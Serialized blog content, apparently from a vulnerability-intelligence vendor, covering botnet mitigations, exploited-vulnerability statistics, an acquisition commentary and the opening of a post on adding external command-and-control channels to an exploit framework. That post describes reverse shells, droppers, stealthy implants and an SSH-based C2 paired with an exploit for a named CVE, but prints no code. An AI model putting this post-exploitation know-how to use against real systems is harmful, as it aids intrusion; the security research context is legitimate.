Interestingly, only 27 of these vulnerabilities are listed in CISA's Known Exploited Vulnerabilities (KEV) catalog. VulnCheck has since updated its own KEV resource to include all 66 vulnerabilities, and we expect CISA is likely to follow suit in the coming days\u002Fweeks\u002Fmonths.",[18,66019,66020],{},"Prior to this advisory, VulnCheck already had strong coverage. Besides the 41 known exploited vulnerabilities, 6 additional vulnerabilities were known to be weaponized (71.2%). Of the remaining vulnerabilities, 11 have proof-of-concept (PoC) exploit code, while 8 had no available exploit evidence prior to this advisory (12.1%).",[61,66022,66024],{"id":66023},"recommended-mitigations-from-the-fbi","Recommended Mitigations from the FBI",[18,66026,66027],{},"The FBI recommends several actions to mitigate threats posed by botnets like Flax Typhoon. These actions apply both to preventing IoT devices from becoming part of a botnet and to defending networks from already active botnets:",[22,66029,66030,66033,66036,66039,66042,66045,66048],{},[25,66031,66032],{},"Disable unused services and ports",[25,66034,66035],{},"Implement network segmentation",[25,66037,66038],{},"Monitor for high network traffic volume",[25,66040,66041],{},"Apply patches and updates",[25,66043,66044],{},"Replace default passwords with strong passwords",[25,66046,66047],{},"Plan for device reboots",[25,66049,66050],{},"Replace end-of-life equipment",[61,66052,66054],{"id":66053},"taking-an-evidence-based-approach-to-vulnerability-prioritization","Taking an Evidence-Based Approach to Vulnerability Prioritization",[18,66056,66057],{},[68,66058],{":width":10862,"alt":62506,"src":66059},"\u002Fblog\u002Fflax-typhoon-botnet\u002Fevidence-based-prioritization.png",[18,66061,66062,66066],{},[47,66063,66065],{"href":54458,"rel":66064},[51],"Prioritizing vulnerabilities"," effectively requires a comprehensive approach that integrates exploit evidence, environmental context, and additional risk factors. 
By utilizing threat intelligence and vulnerability attributes, organizations can make informed decisions in prioritizing vulnerabilities and reducing an organization's overall risk. At VulnCheck, we provide the tools and intelligence necessary to navigate the complex landscape of vulnerability management. Our resources, such as the VulnCheck KEV and Exploit & Vulnerability Intelligence, empower security practitioners to prioritize and remediate vulnerabilities effectively.",[61,66068,202],{"id":201},[18,66070,205],{},[18,66072,208],{},[18,66074,211,66075,217],{},[47,66076,216],{"href":214,"rel":66077},[51],{"title":219,"searchDepth":220,"depth":220,"links":66079},[66080,66081,66082,66083,66084,66085,66086],{"id":65702,"depth":220,"text":65703},{"id":65720,"depth":220,"text":65721},{"id":65776,"depth":220,"text":65777},{"id":66008,"depth":220,"text":66009},{"id":66023,"depth":220,"text":66024},{"id":66053,"depth":220,"text":66054},{"id":201,"depth":220,"text":202},"Last week, Five Eyes agencies issued a Joint Cybersecurity Advisory titled, “People's Republic of China-Linked Actors Compromise Routers and IoT Devices for Botnet Operations” which we explore in this blog post.",{"slug":66089},"flax-typhoon-botnet","\u002Fblog\u002Fflax-typhoon-botnet",{"title":65666,"description":66087},"blog\u002Fflax-typhoon-botnet",[1279],"_BXlurZScs2DN1fRAPsgUbQ93Pw0WHDZHGLJsN_KNtY",{"id":66096,"title":66097,"articles":7,"authors":66098,"body":66100,"date":66190,"description":66191,"extension":234,"image":7,"link":7,"meta":66192,"navigation":237,"path":66194,"seo":66195,"series":7,"stem":66196,"subtype":7,"tags":66197,"__hash__":66198},"blog\u002Fblog\u002F5-ways-to-enhance-your-security-product.md","5 Ways to Enhance Your Security Product Offering with 
VulnCheck",[66099],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":66101,"toc":66187},[66102,66107,66111,66114,66121,66125,66128,66135,66139,66142,66148,66152,66155,66162,66166,66169,66176,66178,66180,66182],[18,66103,66104],{},[68,66105],{":width":10862,"alt":66097,"src":66106},"\u002Fblog\u002F5-ways-to-enhance-your-security-product\u002F5-ways.png",[1920,66108,66110],{"id":66109},"_1-help-customers-prioritize-vulnerabilities-with-real-time-intelligence","1. Help customers prioritize vulnerabilities with real-time intelligence",[18,66112,66113],{},"VulnCheck’s Exploit & Vulnerability Intelligence streamlines the process of correlating data across hundreds of sources. It tracks Known Exploited Vulnerabilities, threat actors, botnets, ransomware, exploits, weaponized vulnerabilities, exploit timelines, MITRE ATT&CK, CAPEC, and more.",[18,66115,66116],{},[47,66117,66120],{"href":66118,"rel":66119},"https:\u002F\u002Fdocs.vulncheck.com\u002Fproducts\u002Fexploit-and-vulnerability-intelligence\u002Fexploit-intelligence",[51],"Learn more about VulnCheck Exploit & Vulnerability Intelligence",[1920,66122,66124],{"id":66123},"_2-provide-visibility-into-vulnerable-products-with-vulncheck-generated-cpe","2. Provide visibility into vulnerable products with VulnCheck-generated CPE",[18,66126,66127],{},"VulnCheck quickly generates accurate Common Platform Enumeration (CPE) mappings, linking technology systems, software, and packages to their associated CVEs.",[18,66129,66130],{},[47,66131,66134],{"href":66132,"rel":66133},"https:\u002F\u002Fdocs.vulncheck.com\u002Fproducts\u002Fexploit-and-vulnerability-intelligence\u002Fcpe",[51],"Learn more about VulnCheck CPE",[1920,66136,66138],{"id":66137},"_3-expand-detection-capabilities-for-initial-access-exploitation-with-detection-artifacts","3. 
Expand detection capabilities for initial access exploitation with detection artifacts",[18,66140,66141],{},"According to Mandiant, initial access vulnerabilities were a leading cause of data breaches in 2022. VulnCheck’s Initial Access Intelligence offers timely detection artifacts, enabling organizations to respond rapidly to these emerging threats.",[18,66143,66144],{},[47,66145,66147],{"href":59857,"rel":66146},[51],"Learn more about VulnCheck Initial Access Intelligence",[1920,66149,66151],{"id":66150},"_4-broaden-visibility-into-open-source-vulnerabilities-with-the-largest-inventory-of-purls","4. Broaden visibility into open source vulnerabilities with the largest inventory of pURLs",[18,66153,66154],{},"VulnCheck monitors package dependencies across a wide array of programming languages and operating system package managers. For tracked packages, VulnCheck includes vulnerability, license, research attributes, and fix information when possible.",[18,66156,66157],{},[47,66158,66161],{"href":66159,"rel":66160},"https:\u002F\u002Fdocs.vulncheck.com\u002Fproducts\u002Fexploit-and-vulnerability-intelligence\u002Fpackage-manager-support",[51],"Learn more about VulnCheck package manager support",[1920,66163,66165],{"id":66164},"_5-identify-potentially-vulnerable-systems-that-may-be-targeted-by-initial-access-exploits","5. 
Identify potentially vulnerable systems that may be targeted by initial access exploits",[18,66167,66168],{},"VulnCheck IP Intelligence tracks potentially vulnerable systems and monitors command & control (C2) attacker infrastructure and honeypots, offering crucial insights into potential targets.",[18,66170,66171],{},[47,66172,66175],{"href":66173,"rel":66174},"https:\u002F\u002Fdocs.vulncheck.com\u002Fproducts\u002Fip-intelligence\u002Fintroduction",[51],"Learn more about VulnCheck IP Intelligence",[61,66177,202],{"id":201},[18,66179,205],{},[18,66181,208],{},[18,66183,211,66184,217],{},[47,66185,216],{"href":214,"rel":66186},[51],{"title":219,"searchDepth":220,"depth":220,"links":66188},[66189],{"id":201,"depth":220,"text":202},"2024-09-17","Discover 5 ways VulnCheck enhances your security product offering with real-time intelligence, detection capabilities, and expanded vulnerability visibility.",{"slug":66193},"5-ways-to-enhance-your-security-product","\u002Fblog\u002F5-ways-to-enhance-your-security-product",{"title":66097,"description":66191},"blog\u002F5-ways-to-enhance-your-security-product",[23275],"OVcJRT94uo6anCAFpMP7KhIgkNqthOyuvTN8PEJCnlY",{"id":66200,"title":66201,"articles":7,"authors":66202,"body":66204,"date":66381,"description":66382,"extension":234,"image":7,"link":7,"meta":66383,"navigation":237,"path":66385,"seo":66386,"series":7,"stem":66387,"subtype":7,"tags":7,"__hash__":66388},"blog\u002Fblog\u002Fmastercard-recorded-future-acquisition.md","Intelligence is the Most Important and Most Lucrative Asset in 
Cybersecurity",[66203],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},{"type":15,"value":66205,"toc":66376},[66206,66220,66226,66234,66237,66248,66251,66255,66258,66261,66274,66288,66291,66294,66298,66306,66315,66318,66321,66324,66327,66330,66339,66342,66345,66349,66352,66355,66364,66367,66370,66373],[18,66207,66208,66213,66214,66219],{},[47,66209,66212],{"href":66210,"rel":66211},"https:\u002F\u002Fwww.mastercard.com\u002Fnews\u002Fpress\u002F2024\u002Fseptember\u002Fmastercard-invests-in-continued-defense-of-global-digital-economy-with-acquisition-of-recorded-future\u002F",[51],"Recorded Future was acquired by Mastercard yesterday for $2.65B",", which is an encouraging macro indicator for the threat intelligence market and adjacent markets. Mastercard has plucked off acquisition targets in the broader cyber space in a pragmatic way to maintain competitive advantage vs ",[47,66215,66218],{"href":66216,"rel":66217},"https:\u002F\u002Fusa.visa.com",[51],"Visa"," and others.",[18,66221,66222],{},[68,66223],{":width":10862,"alt":66224,"src":66225},"Master Card Acquires Recorded Future","\u002Fblog\u002Fmastercard-recorded-future-acquisition\u002Fmastercard-recorded-future.png",[18,66227,29859,66228,66233],{},[47,66229,66232],{"href":66230,"rel":66231},"https:\u002F\u002Fpitchbook.com",[51],"Pitchbook",", Recorded Future had over $1.1B in investment pumped into the business between funding and the sale to Insight Partners a few years ago.",[18,66235,66236],{},"But what does this mean for the broader threat intelligence market and cybersecurity as a whole? 
This acquisition marks a pivotal moment with some specific trends:",[22,66238,66239,66242,66245],{},[25,66240,66241],{},"The broader tech sector has been working to bump up valuation and acquisition pricing this year.",[25,66243,66244],{},"The financial industry needs to fill the gap of robust cyber tooling with the advanced capabilities of premier threat intelligence providers such as Recorded Future.",[25,66246,66247],{},"Financial institutions are increasingly taking an active role in cybersecurity, recognizing that threats to digital payments are threats to their core business.",[18,66249,66250],{},"This gives Mastercard a first-mover advantage in rallying around intelligence as a solution. It signals that threat intelligence, in all forms, has risen to the top of the food chain as an essential part of any major SOC - moving in the direction of collective intelligence that's integrated into a cyber-centric, predictive approach.",[61,66252,66254],{"id":66253},"what-are-the-implications","What are the Implications?",[18,66256,66257],{},"The Recorded Future acquisition isn't just MC bolstering its own security capabilities—it's a strategic move to position the company as a leader in cybersecurity for the financial sector and beyond.",[18,66259,66260],{},"Any cybersecurity technology that Mastercard evaluates to potentially bring into its portfolio is going to be intrinsically linked somehow to reducing the risk around fraud, and around the probability of breaches occurring.",[18,66262,66263,66268,66269,66273],{},[47,66264,66267],{"href":66265,"rel":66266},"https:\u002F\u002Fwww.cnbc.com\u002F2024\u002F09\u002F12\u002Fwhy-credit-card-fraud-alerts-are-rising.html",[51],"In fact, according to Experian, about 60% of credit card holders in 2023 experienced some sort of attempted fraud."," And global card losses attributed to fraud reached ",[47,66270,66272],{"href":66265,"rel":66271},[51],"$33 billion in 2022",", according to payments industry research company Nilson 
Report, with the U.S. market representing roughly 40% of losses. It has forecast a persistent threat that could reach nearly $400 billion in card fraud in the decade to 2032.",[22,66275,66276,66279],{},[25,66277,66278],{},"So, given that payments companies are responsible for securing transactions in the digital economy as well as POS transactions, it would certainly bolster any merchant’s security if they knew that: Mastercard was providing added cyber tech and insights to enhance how it can protect transactions with more precision.\nMastercard would be rolling new technology solutions to merchants and larger enterprise customers that could help proactively reduce the risk of compromise.",[25,66280,66281,66282,66287],{},"Mastercard has done this in the past - notably with the ",[47,66283,66286],{"href":66284,"rel":66285},"https:\u002F\u002Fwww.mastercard.com\u002Fnews\u002Fpress\u002F2019\u002Fdecember\u002Fmastercard-acquires-riskrecon-to-enhance-cybersecurity-capabilities\u002F",[51],"acquisition of RiskRecon in 2020",", which used internet-based intelligence to measure and score risk against internet-facing assets which organizations either were or were not aware of. I was part of this acquisition, and it certainly was interesting to see the level of thinking Mastercard brought to that process.",[18,66289,66290],{},"This recent move could lead to more customized and targeted solutions. One could envision new offerings like AI-based analysis and specialized intelligence products that integrate Recorded Future's intelligence with existing datasets from its cybersecurity and fraud prevention services.",[18,66292,66293],{},"Surely product managers are salivating over the integration, new product discussions and possibilities they can dream up. 
Although, like most transactions of this size, the business will remain its own operating entity under Mastercard to accommodate the large installed base.",[61,66295,66297],{"id":66296},"whats-this-mean-for-the-threat-intelligence-market","What’s This Mean for the Threat Intelligence Market?",[18,66299,66300,66301],{},"With the increased awareness and appetite for threat intelligence solutions on a global level, this acquisition represents an opportunity for other non-traditional cyber-cyber acquisitions. That’s usually kind of boring anyway because any cyber product company can find a way to integrate a new cyber solution and its people. That said, companies like ",[47,66302,66305],{"href":66303,"rel":66304},"https:\u002F\u002Fwww.securityweek.com\u002Frapid7-acquires-threat-intelligence-firm-intsights-335-million\u002F",[51],"Rapid7 recognized this need about three years ago when they acquired IntSights.",[18,66307,66308,66309,66314],{},"In fact, according to a ",[47,66310,66313],{"href":66311,"rel":66312},"https:\u002F\u002Fwww.gartner.com\u002Fen\u002Fdocuments\u002F4343699",[51],"Gartner report",", the global threat intelligence market is projected to grow at a CAGR of 15.5% in 2023 (which seems low) and sat last year at a range between approximately $3B and $11 billion and is expected to grow to $19.5 billion by 2028. 
(which also seems low).",[18,66316,66317],{},"This acquisition pushes the value of the threat intelligence market into other non-cyber markets in a way that connects cyber technology to the fabric of business operations.",[18,66319,66320],{},"However, this could be the start of a consolidation of sorts of expertise and resources - Mastercard gains access to deep expertise in threat intelligence, proprietary machine learning models and as stated earlier, massive-scale data sets.",[18,66322,66323],{},"This consolidation should lead to more advanced threat detection and response solutions that benefit not only Mastercard's customers but potentially the entire ecosystem if shared more broadly.",[18,66325,66326],{},"Most large \u002F publicly-traded cybersecurity companies already have a significant presence in the threat intelligence market. That said, this will likely prompt other financial institutions and large enterprises to consider similar moves, either by acquiring or partnering with threat intelligence companies.",[18,66328,66329],{},"I’d expect this transaction might lead to a substantial surge in market activity, driving significant innovation at organizations like Visa and Discover or even Experian, which already has an enormous partnership with Security Scorecard.",[18,66331,66332,66333,66338],{},"According to the Ponemon Institute, ",[47,66334,66337],{"href":66335,"rel":66336},"https:\u002F\u002Fwww.ponemon.org\u002Fresearch\u002Fponemon-library\u002F",[51],"64% of organizations globally"," cite the integration of threat intelligence into their security operations as a top priority, which makes sense because the smarter any team or tool can get, the better an organization can protect itself.",[18,66340,66341],{},"Smaller and independent threat intelligence vendors may feel the pressure to innovate faster and provide more specialized or niche services to stand out in a market where bigger players like Mastercard are now entering the fray with substantial 
resources and reach.",[18,66343,66344],{},"By integrating Recorded Future's advanced threat intelligence capabilities, Mastercard can offer more comprehensive and proactive \u002F predictive security solutions to its customers, significantly enhancing its value proposition.",[61,66346,66348],{"id":66347},"but-remember-this","But Remember This",[18,66350,66351],{},"Not all threat intelligence solutions are created equally. Cliche yes, but true. There’s a lot of unpacking to do with what Recorded Future has under the hood. They have amassed a significant amount of data over the years and through its up and down growth cycles.",[18,66353,66354],{},"Formatting, programming languages, third-party inputs, actionability of the data and integration are just the short-list of challenges that will arise when the Mastercard team pulls this apart to build out entirely new solutions. This is also true when maintaining significant deployments in the enterprise and for its Federal customers - meaning there are national security considerations here.",[18,66356,66357,66358,66363],{},"Do we want the protection of our nation’s infrastructure decided by a for-profit, publicly traded payments company? Because that’s real now. 
Recorded Future also has made its own acquisitions that it had to put integration cycles into, like ",[47,66359,66362],{"href":66360,"rel":66361},"https:\u002F\u002Fsecuritytrails.com\u002Fblog\u002Fsecuritytrails-acquired-by-recordedfuture",[51],"Security Trails",", so it’s not just an organically grown intelligence platform \u002F IP over time that Mastercard is getting.",[18,66365,66366],{},"What’s imperative today is that operators within cybersecurity teams need intelligence to be in a format that is easily consumable, simple to integrate \u002F make sense of and autonomous given the heavy signal-to-noise load every team gets from every tool in its SOC.",[18,66368,66369],{},"Where AI was a late-to-the-party add to Recorded Future’s marketing message to make it sound faster, less clunky and not just intelligence reports that require human interpretation, it’s part band-aid and part real at the same time.",[18,66371,66372],{},"However, AI is not a standalone answer on its own, or if you can spell the words “AI.” It speeds up many processes but it isn’t the solve-all technology in every case. Threat intelligence should inform machine-based action around triage, response and risk reduction.",[18,66374,66375],{},"In summary, Mastercard forking over $2.65B for Recorded Future is a positive step toward solving what could be thought of as a multi-trillion dollar+ problem if you bundle global fraud and the costs associated with breaches - leveraging data vs people and tools, which is smart. 
There is a long-term impact that might be felt as a result of this transaction that could help align into a new approach for the financial industry’s fight vs cybercrime.",{"title":219,"searchDepth":220,"depth":220,"links":66377},[66378,66379,66380],{"id":66253,"depth":220,"text":66254},{"id":66296,"depth":220,"text":66297},{"id":66347,"depth":220,"text":66348},"2024-09-13","Recorded Future was acquired by Mastercard today for $2.65B, which is an encouraging macro indicator for the threat intelligence market and adjacent markets.",{"slug":66384},"mastercard-recorded-future-acquisition","\u002Fblog\u002Fmastercard-recorded-future-acquisition",{"title":66201,"description":66382},"blog\u002Fmastercard-recorded-future-acquisition","X_Vyol823ECX_riPLtuY2-4ae3WFmrvkO7v8U00kcoc",{"id":66390,"title":66391,"articles":66392,"authors":66397,"body":66399,"date":64897,"description":66592,"extension":234,"image":7,"link":7,"meta":66593,"navigation":237,"path":66595,"seo":66596,"series":7,"stem":66597,"subtype":7,"tags":66598,"__hash__":66599},"blog\u002Fblog\u002Fkev-report-summer-2024.md","VulnCheck Known Exploited Vulnerabilities Report - Summer 2024",[66393],{"title":66394,"source":61436,"link":66395,"date":66396},"Risky Biz News: US says RT moved into cyber and intelligence-gathering territory","https:\u002F\u002Fnews.risky.biz\u002Frisky-biz-news-us-says-rt-moved-into-cyber-and-intelligence-gathering-territory\u002F","2024-09-16",[66398],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":66400,"toc":66589},[66401,66404,66424,66426,66440,66444,66449,66452,66478,66482,66488,66491,66494,66497,66501,66507,66513,66516,66520,66526,66529,66532,66536,66541,66544,66547,66550,66565,66567,66578,66580,66582,66584],[18,66402,66403],{},"Before diving into this month's Known Exploited Vulnerabilities update, I'd like to note that this post covers data from June, July, and August so we are calling it a Summer report. 
This is due to prioritizing other research over the last few months, which we’ve been focused on publishing and which is worth a read:",[22,66405,66406,66412,66417],{},[25,66407,66408],{},[47,66409,66411],{"href":41691,"rel":66410},[51],"State of Exploitation 1H-2024",[25,66413,66414],{},[47,66415,64661],{"href":54458,"rel":66416},[51],[25,66418,66419],{},[47,66420,66423],{"href":66421,"rel":66422},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fmetasploit-kev",[51],"Weaponized Vulnerabilities Deserve a Seat at the Prioritization Table",[1920,66425,20],{"id":3520},[22,66427,66428,66431,66434,66437],{},[25,66429,66430],{},"VulnCheck captured exploitation evidence for 158 vulnerabilities with initial evidence emerging during June, July and August.",[25,66432,66433],{},"The evidence of known exploitation was collected from over 35 different sources.",[25,66435,66436],{},"Software that topped the list of new Known Exploited Vulnerabilities (KEVs) includes Microsoft Windows, Apache OFBiz, PHP Everywhere, OSGeo GeoServer, ServiceNow, Google Chromium, and the Linux Kernel.",[25,66438,66439],{},"CISA added 42 CVEs to their KEV list during June, July and August. For 71.4% (30\u002F42) of those vulnerabilities, VulnCheck provided evidence earlier than CISA.",[1920,66441,66443],{"id":66442},"summer-vendor-and-product-breakdown","Summer Vendor and Product Breakdown",[18,66445,66446],{},[68,66447],{":width":10862,"alt":58618,"src":66448},"\u002Fblog\u002Fkev-report-summer-2024\u002Fvulncheck-august-exploitation.png",[18,66450,66451],{},"The 158 CVEs with known exploitation evidence were associated with 119 software suppliers across 136 unique products. 
The following software topped the list with two or more CVEs with known exploitation:",[22,66453,66454,66457,66460,66463,66466,66469,66472,66475],{},[25,66455,66456],{},"Microsoft Windows (10)",[25,66458,66459],{},"Apache OFBiz (3)",[25,66461,66462],{},"PHP Everywhere (3)",[25,66464,66465],{},"OSGeo GeoServer (3)",[25,66467,66468],{},"Totolink (2)",[25,66470,66471],{},"ServiceNow (2)",[25,66473,66474],{},"Google Chromium (2)",[25,66476,66477],{},"Linux Kernel (2)",[1920,66479,66481],{"id":66480},"summer-trends-in-vulnerability-exploitation-disclosure","Summer Trends in Vulnerability Exploitation Disclosure",[18,66483,66484],{},[68,66485],{":width":10862,"alt":66486,"src":66487},"VulnCheck KEV Trends","\u002Fblog\u002Fkev-report-summer-2024\u002Fvulncheck-kev-trends.png",[18,66489,66490],{},"Vulnerability exploitation disclosure occasionally appears to spike, as evidence of exploitation is reported publicly at different times or when we onboard new sources like ShadowServer.",[18,66492,66493],{},"We expect the baseline of new KEVs to range between 30-50 vulnerabilities per month, with occasional spikes around quarterly reports in October\u002FNovember and the start of the new year. An increasing trend toward public disclosure of exploitation evidence appears to be continuing along with the growth in vulnerability disclosure, which we encourage, as it enhances organizations' visibility into vulnerability exploitation.",[18,66495,66496],{},"If you use VulnCheck KEV, you might have noticed an overall increase in the total number of Known Exploited Vulnerabilities beyond just the new evidence we captured. This is due to our ongoing efforts to capture historical exploitation evidence. 
We hope to write more about this soon to provide some clarity on this topic.",[1920,66498,66500],{"id":66499},"who-was-the-first-to-report-the-exploited-vulnerabilities","Who Was the First to Report the Exploited Vulnerabilities?",[18,66502,66503],{},[68,66504],{":width":10862,"alt":66505,"src":66506},"VulnCheck KEV Sources","\u002Fblog\u002Fkev-report-summer-2024\u002Fvulncheck-kev-august-source.png",[18,66508,66509,66510,59],{},"We collected exploitation evidence from over 35 sources. Notably, F5 published two reports, and CISA released a report titled \"North Korea Cyber Group Conducts Global Espionage Campaign,\" both with significant numbers of CVEs. Additionally, several vulnerabilities on the CISA KEV list were disclosed simultaneously with the vendors, such as Microsoft. For a deeper dive into these details, you can access the full dataset of the VulnCheck KEV ",[47,66511,305],{"href":2871,"rel":66512},[51],[18,66514,66515],{},"It's worth noting that we audited and added evidence from Patchstack and Wordfence over the last few months. Both of these projects track WordPress plugin vulnerabilities and exploitation, so VulnCheck KEV now has much better coverage for WordPress plugins thanks to these sources.",[1920,66517,66519],{"id":66518},"how-did-vulncheck-kev-do-compared-with-cisa-kev","How did VulnCheck KEV do compared with CISA KEV?",[18,66521,66522],{},[68,66523],{":width":10862,"alt":66524,"src":66525},"VulnCheck KEV vs. CISA KEV","\u002Fblog\u002Fkev-report-summer-2024\u002Ffirst-to-kev.png",[18,66527,66528],{},"Between June and August, VulnCheck added 158 CVEs to its Known Exploited Vulnerabilities (KEV) list, while CISA added 42 CVEs to their KEV list. 
For 30 of these 42 (71.4%) vulnerabilities, VulnCheck provided evidence earlier than CISA, enabling organizations to gain early visibility into vulnerabilities that later appear on the CISA KEV list.",[18,66530,66531],{},"The 12 vulnerabilities first disclosed by CISA KEV included OSGeo GeoServer, Dahua IP Camera, Microsoft Project, Microsoft Windows (7), Versa Director (1) and Roundcube (1). With the exception of Dahua, OSGeo GeoServer and Roundcube, these vulnerabilities were disclosed within 2 days of the exploitation evidence. The Microsoft vulnerabilities were also disclosed at the same time through Microsoft MSRC, which we also capture in VulnCheck KEV.",[1920,66533,66535],{"id":66534},"a-quick-peek-into-scoring-systems-mapped-to-known-exploitation","A Quick Peek into Scoring Systems Mapped to Known Exploitation",[18,66537,66538],{},[68,66539],{":width":10862,"alt":66524,"src":66540},"\u002Fblog\u002Fkev-report-summer-2024\u002Fkev-cvss-epss.png",[18,66542,66543],{},"We've continued to analyze Known Exploitation in relation to vulnerability scoring systems, specifically CVSS and EPSS. Our goal is to gain insights into how these scoring systems can better reflect known exploitation and emerging threats.",[18,66545,66546],{},"To enhance visibility into CVSS and EPSS, I created a plot of known exploitation mapped to these systems. Yellow indicates higher density, while purple represents lower density of CVEs associated with known exploitation.\nBy applying an EPSS score (Early September scoring) of 0.1 or a 10% probability of exploitation or higher, we find that 40 CVEs (25.3%) align with Known Exploitation captured for the first time during June, July and August. With a CVSS-BT score of 9 or higher, 57 CVEs (36.1%) map to Known Exploitation. 
We plan to explore scoring systems further to provide deeper insights when we have more time.",[18,66548,66549],{},"Related to the topic of vulnerability prioritization, we suggest exploring these articles:",[22,66551,66552,66558],{},[25,66553,66554,66555],{},"Taking an Evidence Based Approach to Prioritization: ",[47,66556,54458],{"href":54458,"rel":66557},[51],[25,66559,66560,66561],{},"Do We Need Yet Another Vulnerability Scoring System? (Ben Edwards, Bitsight): ",[47,66562,66563],{"href":66563,"rel":66564},"https:\u002F\u002Fwww.bitsight.com\u002Fblog\u002Fdo-we-need-yet-another-vulnerability-scoring-system-if-its-ssvc-thats-resounding-yass",[51],[1920,66566,64665],{"id":64664},[18,66568,64668,66569,64672,66572,982,66575,59],{},[47,66570,28667],{"href":40745,"rel":66571},[51],[47,66573,1233],{"href":2871,"rel":66574},[51],[47,66576,40672],{"href":40670,"rel":66577},[51],[61,66579,202],{"id":201},[18,66581,205],{},[18,66583,208],{},[18,66585,211,66586,217],{},[47,66587,216],{"href":214,"rel":66588},[51],{"title":219,"searchDepth":220,"depth":220,"links":66590},[66591],{"id":201,"depth":220,"text":202},"During June, July, and August, we captured exploitation evidence for 158 vulnerabilities, with initial evidence emerging within this period for the first time. 
The evidence was collected from over 35 different sources.",{"slug":66594},"kev-report-summer-2024","\u002Fblog\u002Fkev-report-summer-2024",{"title":66391,"description":66592},"blog\u002Fkev-report-summer-2024",[1279],"RM3fQJfHzYMtsVeYUnv585SammTtmHSssCiZ69ZlJq4",{"id":66601,"title":66602,"articles":7,"authors":66603,"body":66605,"date":64874,"description":67469,"extension":234,"image":7,"link":7,"meta":67470,"navigation":237,"path":67472,"seo":67473,"series":7,"stem":67474,"subtype":7,"tags":7,"__hash__":67475},"blog\u002Fblog\u002Fgo-exploit-external-c2s.md","VulnCheck go-exploit External C2s",[66604],{"name":4410,"avatar":4411,"link":4412,"linkName":4413},{"type":15,"value":66606,"toc":67464},[66607,66610,66624,66630,66638,66653,66656,66676,66680,66689,66717,66720,66723,66742,66745,66984,66987,67003,67011,67014,67127,67130,67429,67432,67436,67439,67442,67446,67449,67452,67461],[263,66608],{":list":66609,"ico":266,"title":66602},"[\"New go-exploit feature in 1.25.0 allows anyone to easily develop and integrate their own C2.\",\"Example of an SSH-based C2 integrated in an exploit for CVE-2024-38856.\",\"The future of integrating C2 frameworks and interactions.\"]",[18,66611,66612,66613,66617,66618,66623],{},"The Initial Access Intelligence team is happy to announce go-exploit external C2s. This feature enables community members to create C2 channels and payloads with direct integration into the ",[47,66614,66616],{"href":14297,"rel":66615},[51],"go-exploit framework",". The changes initially pushed in ",[47,66619,66622],{"href":66620,"rel":66621},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fgo-exploit\u002Freleases\u002Ftag\u002Fv1.25.0",[51],"1.25.0"," give go-exploit the flexibility to import external C2 modules and define multiple types of external C2s. 
For example, the following demonstrates an SSH-based C2 integrated into a go-exploit for CVE-2024-38856 from a third-party repository:",[18,66625,66626],{},[68,66627],{":width":10862,"alt":66628,"src":66629},"go-exploit SSH Server External C2","\u002Fblog\u002Fgo-exploit-external-c2s\u002Fexternal-c2-ssh-server.png",[18,66631,66632,66633,66637],{},"One of ",[47,66634,66636],{"href":14297,"rel":66635},[51],"go-exploit’s"," goals is the intentional separation of duties. Creating an exploitation framework is a hard problem, and creating a good payload or implant is another hard problem. Making secure channels to communicate with implants is difficult, dynamically modifying payloads for evasion is also difficult, and managing them is another issue, each further increasing the complexity surrounding specific projects. This complexity balloons when you try to combine these components to solve every post-exploitation corner case and open-source these systems. With go-exploit, we’ve decided to stay focused on the goals of creating a flexible framework-driven reproduction of exploits.",[18,66639,66640,66641,66646,66647,66652],{},"In practice, this means that the framework keeps the internal collection of exploit payloads & C2 interactions down to a very simple, minimal and practical set, with trivial reverse shells, bind shells, droppers, and a few other in-memory use case-specific goodies that the team considers to be the \"bare minimum\" for use cases of N-day development. While this might work great for someone conducting penetration tests, the post-exploitation experience may be too barebones and oftentimes just a thin wrapper around calls to shell execution. This is not ideal for teams more concerned about stealth and more hesitant to throw around exploits that don't explicitly use in-house developed implants, where the Indicators of Compromise (IoCs) are a primary concern or payloads don't interact nicely with their operation management framework. 
Luckily, VulnCheck recognizes this potential limitation and has always offered a ",[47,66642,66645],{"href":66643,"rel":66644},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fgo-exploit\u002Fblob\u002Fmain\u002Fdocs\u002Fc2.md#using--o",[51],"flag for informing the framework that the exploit handles the payload handling externally"," or via ",[47,66648,66651],{"href":66649,"rel":66650},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fgo-exploit\u002Fblob\u002Fmain\u002Fdocs\u002Fc2.md#using-httpservefile",[51],"served HTTP files",", which allows any payloads to trigger from the context of go-exploit but no callbacks get handled by the framework. That said, this isn’t always enough for real-life complex use cases and doesn't fully solve the other issues laid out.",[18,66654,66655],{},"Looking to the future, the team identified a few special requirements and wants for practitioners that other frameworks aren't great at supporting as first-class citizens:",[22,66657,66658,66664,66670],{},[25,66659,66660,66663],{},[295,66661,66662],{},"Decoupling exploitation"," - Exploitation is its own step that shouldn't be as concerned about all the components of payload that are delivered in many cases. The team wants to allow for exploitation to slot in when needed or when that first foothold isn't easily available to teams. Exact use cases vary for everyone and exploitation should be flexible.",[25,66665,66666,66669],{},[295,66667,66668],{},"Tighter C2 framework integration"," - Being able to communicate with C2 frameworks and payload-catching components should be supported when possible to allow for the communication of exploitation steps and interaction with C2 frameworks.",[25,66671,66672,66675],{},[295,66673,66674],{},"Experimentation"," - Strange stuff works, and many other frameworks make it too hard to experiment. 
